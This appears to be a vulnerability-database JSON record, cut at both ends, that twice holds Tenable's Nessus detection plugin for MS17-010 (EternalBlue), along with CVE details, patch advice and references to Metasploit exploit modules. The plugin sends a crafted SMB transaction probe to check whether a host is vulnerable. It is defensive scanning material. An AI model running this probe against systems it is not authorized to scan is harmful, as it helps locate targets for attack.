["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T14:06:24", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-12T14:06:24", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-12T14:06:24", "differentElements": ["vpr"], "edition": 11}, {"bulletin": {"id": "MS17-010.NASL", "hash": "59a3f59c439bc2d52437908b8868f320", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2020-10-15T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?234f8ef8", "http://www.nessus.org/u?4c7e0cf3", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?b9d9ebf9"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-18T12:44:33", "history": [], "viewCount": 7179, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T12:44:33", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-18T12:44:33", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code 